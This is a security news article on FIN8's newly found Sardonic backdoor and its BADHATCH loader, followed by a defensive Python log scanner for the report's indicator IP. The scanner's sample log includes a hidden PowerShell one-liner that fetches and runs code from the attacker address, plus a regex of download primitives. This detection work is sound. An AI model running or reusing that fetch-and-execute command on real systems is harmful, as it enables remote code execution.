FIN8 group used a previously undetected Sardonic backdoor in a recent attack

Pierluigi Paganini August 25, 2021

Financially motivated threat actor FIN8 employed a previously undocumented backdoor, tracked as ‘Sardonic,’ in recent attacks.

The financially motivated threat actor FIN8 has been observed employing a previously undetected backdoor, dubbed Sardonic, on infected systems.

The new backdoor was spotted by researchers from cybersecurity firm Bitdefender while investigating an unsuccessful attack by FIN8 against an unnamed financial institution in the U.S.

Sardonic is a sophisticated backdoor with a wide range of features and was designed to evade detection. According to the researchers, Sardonic is still under development: it consists of several components, some of which were compiled just before the attack.

The group has been active since 2016 and relies on known malware such as PUNCHTRACK and BADHATCH to infect PoS systems and steal payment card data.

The group resurfaced in March 2021, after more than a year of apparent inactivity. It focuses on organizations in the insurance, retail, technology, and chemical industries in the U.S., Canada, South Africa, Puerto Rico, Panama, and Italy.

In the most recent attack investigated by Bitdefender, the group first conducted reconnaissance on the target network, then used the information gathered to move laterally and escalate privileges. The group also deployed its BADHATCH backdoor.

“The BADHATCH loader was deployed using PowerShell scripts downloaded from the 104.168.237[.]21 IP address using the legitimate service. It was used during the reconnaissance, lateral movement, privilege escalation and possibly impact stages. There were multiple attempts to deploy the Sardonic backdoor on domain controllers in order to continue with privilege escalation and lateral movement, but the malicious command lines were blocked. We saw no traces of BADHATCH on these high-value targets. However, we identified one SQL server where some artifacts indicate that the threat actors intended to deploy both backdoors.” reads the report published by Bitdefender.

Sardonic backdoor

Sardonic is written in C++. It allows operators to gather system information, execute arbitrary commands, and load and execute additional plugins.

Below are the recommendations provided by the researchers to minimize the impact of financial malware:

• Separate the PoS network from the ones used by employees or guests.
• Introduce cybersecurity awareness training for employees to help them spot phishing e-mails.
• Tune the e-mail security solution to automatically discard malicious or suspicious attachments.
• Integrate threat intelligence into existing SIEM or security controls for relevant Indicators of Compromise.
• Small and medium organizations without a dedicated security team should consider outsourcing security operations to Managed Detection and Response providers.
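As an added example (not code from this article or from Bitdefender's report), the following Python snippet shows what the SIEM recommendation looks like in practice: it refangs the defanged IP address quoted from the report above, scans log lines for it with boundaries so that a longer address sharing the same prefix does not produce a false positive, and separately flags PowerShell command lines that fetch remote content. The proxy and process-creation log lines, hostnames and internal addresses are constructed for illustration; only the 104.168.237[.]21 indicator comes from the page.

```python
import re
from dataclasses import dataclass

# Indicator quoted from the Bitdefender report on this page, kept in the
# defanged form threat-intel reports use so it cannot be clicked by accident.
DEFANGED_IOCS = [
    "104.168.237[.]21",
]


@dataclass
class Hit:
    line_no: int      # 1-based index into the scanned log
    indicator: str    # refanged indicator that matched
    line: str         # the full log line, for the analyst's context


def refang(indicator: str) -> str:
    """Convert report-style defanging ('[.]', 'hxxp') back to the raw form found in logs."""
    return (indicator.replace("[.]", ".")
                     .replace("[:]", ":")
                     .replace("hxxps://", "https://")
                     .replace("hxxp://", "http://"))


def build_matcher(defanged):
    """Compile one regex for all indicators.

    The negative lookbehind/lookahead stop 104.168.237.21 from matching inside
    104.168.237.210 or 1104.168.237.21, a common source of false positives
    when IoCs are matched as plain substrings.
    """
    alternatives = [r"(?<![\w.])" + re.escape(refang(i)) + r"(?![\w.])" for i in defanged]
    return re.compile("|".join(alternatives))


def scan_log(lines, defanged=DEFANGED_IOCS):
    """Return a Hit for every log line that contains one of the indicators."""
    matcher = build_matcher(defanged)
    return [Hit(n, m.group(0), line)
            for n, line in enumerate(lines, 1)
            if (m := matcher.search(line))]


# Download primitives commonly seen in PowerShell loader one-liners.
_PS_DOWNLOAD = re.compile(
    r"(Invoke-WebRequest|iwr\b|DownloadString|DownloadFile|Net\.WebClient|Start-BitsTransfer)",
    re.IGNORECASE,
)


def powershell_download_lines(lines):
    """Return 1-based line numbers whose cmd= field is a PowerShell invocation that downloads content.

    This is IoC-independent, so it still fires if the operators move to a new host.
    """
    flagged = []
    for n, line in enumerate(lines, 1):
        m = re.search(r'cmd="([^"]*)"', line)
        if not m:
            continue
        cmd = m.group(1)
        if re.search(r"powershell(\.exe)?", cmd, re.IGNORECASE) and _PS_DOWNLOAD.search(cmd):
            flagged.append(n)
    return flagged


# Constructed sample log (hypothetical hosts, timestamps and internal IPs).
SAMPLE_LOG = [
    "2021-03-12T10:14:03Z proxy allow src=10.0.4.17 dst=104.168.237.21 url=http://104.168.237.21/update.ps1 ua=WindowsPowerShell/5.1",
    '2021-03-12T10:14:05Z sysmon evt=1 host=WS-0417 cmd="powershell.exe -nop -w hidden -c IEX (New-Object Net.WebClient).DownloadString(\'http://104.168.237.21/a\')"',
    "2021-03-12T10:15:11Z proxy allow src=10.0.4.22 dst=104.168.237.210 url=http://104.168.237.210/index.html ua=Mozilla/5.0",
    r'2021-03-12T10:16:00Z sysmon evt=1 host=WS-0418 cmd="powershell.exe -File C:\scripts\inventory.ps1"',
]


if __name__ == "__main__":
    for hit in scan_log(SAMPLE_LOG):
        print(f"IoC {hit.indicator} on line {hit.line_no}: {hit.line}")
    print("PowerShell download command lines:", powershell_download_lines(SAMPLE_LOG))
```

The third sample line is the control case: a plain substring match would flag 104.168.237.210 as the report's indicator, while the anchored pattern correctly ignores it. Feeding the output of `scan_log` and `powershell_download_lines` into a SIEM alert is the integration the recommendation asks for.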
